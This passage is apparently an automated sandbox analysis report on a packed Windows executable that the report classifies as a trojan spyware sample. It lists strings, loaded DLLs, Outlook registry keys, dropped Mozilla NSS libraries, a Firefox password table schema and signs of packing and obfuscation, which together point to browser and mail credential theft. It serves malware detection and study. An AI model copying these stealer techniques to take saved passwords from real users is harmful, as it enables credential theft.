Source: file.exe, 00000000.00000003.1860223583.0000000029738000.00000004.00000020.00020000.00000000.sdmp, KKJDGDHIDBGIECBGHJDBAAKJDH.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: file.exe, 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: KKJDGDHIDBGIECBGHJDBAAKJDH.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.1860223583.0000000029738000.00000004.00000020.00020000.00000000.sdmp, KKJDGDHIDBGIECBGHJDBAAKJDH.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C60ED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,	0_2_6C60ED10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C64B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C64B700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C64B8C0 rand_s,NtQueryVirtualMemory,	0_2_6C64B8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C64B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	0_2_6C64B910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5EF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C5EF280

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00839990	0_2_00839990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00711127	0_2_00711127
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0074A1F3	0_2_0074A1F3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0083D91D	0_2_0083D91D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007F6266	0_2_007F6266
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0083EA10	0_2_0083EA10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0083B3FD	0_2_0083B3FD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0095B323	0_2_0095B323
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006FF392	0_2_006FF392
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00779C41	0_2_00779C41
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00840438	0_2_00840438
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007BBD13	0_2_007BBD13
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0084552C	0_2_0084552C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00721648	0_2_00721648
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0093865C	0_2_0093865C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00841F96	0_2_00841F96
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0075870A	0_2_0075870A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E35A0	0_2_6C5E35A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F5440	0_2_6C5F5440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65545C	0_2_6C65545C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65542B	0_2_6C65542B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65AC00	0_2_6C65AC00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C625C10	0_2_6C625C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C632C10	0_2_6C632C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C626CF0	0_2_6C626CF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F64C0	0_2_6C5F64C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C60D4D0	0_2_6C60D4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5ED4E0	0_2_6C5ED4E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6434A0	0_2_6C6434A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C64C4A0	0_2_6C64C4A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F6C80	0_2_6C5F6C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5FFD00	0_2_6C5FFD00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C60ED10	0_2_6C60ED10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C610512	0_2_6C610512
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6485F0	0_2_6C6485F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C620DD0	0_2_6C620DD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C656E63	0_2_6C656E63
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C604640	0_2_6C604640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C632E4E	0_2_6C632E4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5EC670	0_2_6C5EC670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C609E50	0_2_6C609E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C623E50	0_2_6C623E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C649E30	0_2_6C649E30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C635600	0_2_6C635600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C627E10	0_2_6C627E10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6576E3	0_2_6C6576E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5EBEF0	0_2_6C5EBEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5FFEF0	0_2_6C5FFEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C644EA0	0_2_6C644EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C64E680	0_2_6C64E680
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C605E90	0_2_6C605E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F9F00	0_2_6C5F9F00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C627710	0_2_6C627710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C616FF0	0_2_6C616FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5EDFE0	0_2_6C5EDFE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6377A0	0_2_6C6377A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C62F070	0_2_6C62F070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C608850	0_2_6C608850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C60D850	0_2_6C60D850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C62B820	0_2_6C62B820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C634820	0_2_6C634820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F7810	0_2_6C5F7810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C60C0E0	0_2_6C60C0E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6258E0	0_2_6C6258E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6550C7	0_2_6C6550C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6160A0	0_2_6C6160A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C63B970	0_2_6C63B970
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65B170	0_2_6C65B170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C60A940	0_2_6C60A940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5FD960	0_2_6C5FD960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C61D9B0	0_2_6C61D9B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C625190	0_2_6C625190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C642990	0_2_6C642990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5EC9A0	0_2_6C5EC9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C629A60	0_2_6C629A60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C601AF0	0_2_6C601AF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C62E2F0	0_2_6C62E2F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C628AC0	0_2_6C628AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C614AA0	0_2_6C614AA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C652AB0	0_2_6C652AB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5FCAB0	0_2_6C5FCAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65BA90	0_2_6C65BA90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E22A0	0_2_6C5E22A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E5340	0_2_6C5E5340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5FC370	0_2_6C5FC370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C62D320	0_2_6C62D320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6553C8	0_2_6C6553C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5EF380	0_2_6C5EF380

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 004745C0 appears 316 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C61CBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C6294D0 appears 90 times

Source: file.exe, 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.1925134495.000000006C865000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: mvntvbkx ZLIB complexity 0.9948532676466143

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/22@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C647030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

0_2_6C647030

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00489600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00489600

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00483720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00483720

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\FE8CN8A8.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.1915809216.000000001D560000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1924331677.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1924983749.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.1915809216.000000001D560000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1924331677.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1924983749.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.1915809216.000000001D560000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1924331677.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1924983749.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.1915809216.000000001D560000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1924331677.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1924983749.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.1915809216.000000001D560000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1924331677.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1924983749.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.1915809216.000000001D560000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1924331677.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.1915809216.000000001D560000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1924331677.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1924983749.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.1783369740.000000001D464000.00000004.00000020.00020000.00000000.sdmp, JKEGIDGDGHCAAAAKKFCG.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.1915809216.000000001D560000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1924331677.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.1915809216.000000001D560000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1924331677.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe	String found in binary or memory: ft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d
Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: file.exe	String found in binary or memory: m/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1849856 > 1048576

Source: file.exe

Static PE information: Raw size of mvntvbkx is bigger than: 0x100000 < 0x19d800

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.1924983749.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.1924983749.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.470000.0.unpack :EW;.rsrc :W;.idata :W; :EW;mvntvbkx:EW;sfdfhbqa:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;mvntvbkx:EW;sfdfhbqa:EW;.taggant:EW;

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00489860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00489860

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x1d0f16 should be: 0x1c826d

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: mvntvbkx
Source: file.exe	Static PE information: section name: sfdfhbqa
Source: file.exe	Static PE information: section name: .taggant
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008E308A push eax; mov dword ptr [esp], esi	0_2_008E30AE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0087E88A push 49A459CAh; mov dword ptr [esp], ecx	0_2_0087E96B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008B30D1 push ebp; mov dword ptr [esp], 779DDA94h	0_2_008B30EE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008600DD push 1D9DCC4Fh; mov dword ptr [esp], ebx	0_2_008600E5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009348E9 push edi; mov dword ptr [esp], ebx	0_2_009348F3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009348E9 push ecx; mov dword ptr [esp], ebx	0_2_00934914
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009348E9 push esi; mov dword ptr [esp], edi	0_2_0093496D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009348E9 push 14C5AAAAh; mov dword ptr [esp], ebx	0_2_00934992
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0048B035 push ecx; ret	0_2_0048B048
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007460ED push edx; mov dword ptr [esp], ecx	0_2_00746124
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008CA83F push 2FB8E1E6h; mov dword ptr [esp], ebx	0_2_008CA87E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0085E03B push 23755E87h; mov dword ptr [esp], ebx	0_2_0085FC30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00907857 push 5C9BCC94h; mov dword ptr [esp], edx	0_2_009078B8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00907857 push 30615E8Ah; mov dword ptr [esp], edi	0_2_009078DA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007988A3 push eax; mov dword ptr [esp], edi	0_2_007988A7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007988A3 push 3D594F67h; mov dword ptr [esp], ebp	0_2_0079890D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007988A3 push 70DD0D39h; mov dword ptr [esp], edi	0_2_00798934
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0086B866 push 7C4858CFh; mov dword ptr [esp], eax	0_2_0086B89F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0086B866 push edi; mov dword ptr [esp], ebx	0_2_0086B8AC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0086B866 push edx; mov dword ptr [esp], ebp	0_2_0086B903
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00937070 push 2D86BA11h; mov dword ptr [esp], eax	0_2_009370AF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008E4070 push eax; mov dword ptr [esp], edi	0_2_008E40B3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008E4070 push edx; mov dword ptr [esp], eax	0_2_008E40CB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00839990 push ecx; mov dword ptr [esp], eax	0_2_008399F8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00839990 push ebx; mov dword ptr [esp], 1B9A85EBh	0_2_00839A3A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00839990 push 7C81B16Bh; mov dword ptr [esp], esi	0_2_00839A6C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00839990 push esi; mov dword ptr [esp], ebp	0_2_00839A9A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00839990 push edi; mov dword ptr [esp], 6C8E6C77h	0_2_00839B5A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00839990 push 10C85824h; mov dword ptr [esp], eax	0_2_00839B71
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00839990 push edi; mov dword ptr [esp], ecx	0_2_00839BF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00839990 push edx; mov dword ptr [esp], esi	0_2_00839DB3

Source: file.exe

Static PE information: section name: mvntvbkx entropy: 7.953641960811606

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
